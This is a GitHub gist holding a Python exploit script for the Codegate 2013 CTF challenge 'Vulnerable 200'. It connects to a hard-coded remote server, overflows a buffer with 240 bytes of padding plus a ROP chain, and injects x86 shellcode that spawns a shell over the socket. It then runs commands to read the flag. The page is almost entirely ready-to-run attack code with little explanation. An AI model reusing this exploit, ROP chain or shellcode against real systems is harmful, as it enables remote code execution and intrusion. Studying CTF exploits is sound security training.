Skip to content

Instantly share code, notes, and snippets.

@xelenonz

xelenonz/vuln200.py

Last active December 14, 2015 13:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xelenonz/5093953 to your computer and use it in GitHub Desktop.
Save xelenonz/5093953 to your computer and use it in GitHub Desktop.
Download ZIP
Codegate 2013 Vulnerable 200 exploit code
Raw
vuln200.py
"""
$python vuln200.py
[+] send pwning payload (Stage 1)
[+] Execute Shell (Stage 2)
uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)
"""
import socket,time
from struct import pack
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host = "58.229.122.19"
sk.connect((host,7777))
sk.recv(10240) # menu
def do_write(msg):
sk.send("write"+msg+"\n")
sk.recv(10240)
sk.recv(10240)
shellcode = "\x31\xc0\x31\xdb\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
# do rop with recv() and use .data for paste shellcode
rop = pack("I",0x08048780)
rop += pack("I",0x0804b07c)
rop += pack("I",4)
rop += pack("I",0x0804b07c)
rop += pack("I",0x1000)
rop += pack("I",0)
payload = "A"*240+rop
print "[+] send pwning payload (Stage 1)"
do_write(payload)
print "[+] Execute Shell (Stage 2)"
sk.send(shellcode+"\n")
sk.send("id\n")
print sk.recv(10240)
sk.send("ls -la\n")
print sk.recv(10240)
sk.send("cat key\n")
print sk.recv(10240)
sk.send("cat Pwned.txt\n")
print sk.recv(10240)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment